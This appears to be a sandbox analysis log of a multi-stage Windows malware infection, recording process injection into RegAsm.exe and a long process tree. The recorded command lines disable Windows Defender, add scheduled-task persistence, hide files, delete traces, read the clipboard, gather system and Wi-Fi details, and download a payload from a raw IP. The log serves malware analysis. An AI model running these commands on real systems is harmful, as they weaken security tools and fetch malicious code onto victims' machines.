PID 3548 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3548 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe

"C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\1000004002\7ec52fcc46.exe

"C:\Users\Admin\1000004002\7ec52fcc46.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3716 -ip 3716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 304

C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3548 -ip 3548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 320

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe

"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe

"C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe" /s

C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe

"C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe"

C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe

"C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe

"C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe

"C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\cmd.exe

cmd /c md 400508

C:\Windows\SysWOW64\findstr.exe

findstr /V "architectureeditionshowardhabits" Sterling

C:\Users\Admin\AppData\Local\Temp\7zS6C80.tmp\Install.exe

.\Install.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Environment + Company + Graduated + Vary 400508\y

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif

400508\Cruz.pif 400508\y

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 22:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe\" PP /KQgdidVxOn 385118 /S" /V1 /F

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbuslf.bat" "

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\SysWOW64\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe PP /KQgdidVxOn 385118 /S

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffaf7bb3cb8,0x7ffaf7bb3cc8,0x7ffaf7bb3cd8

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

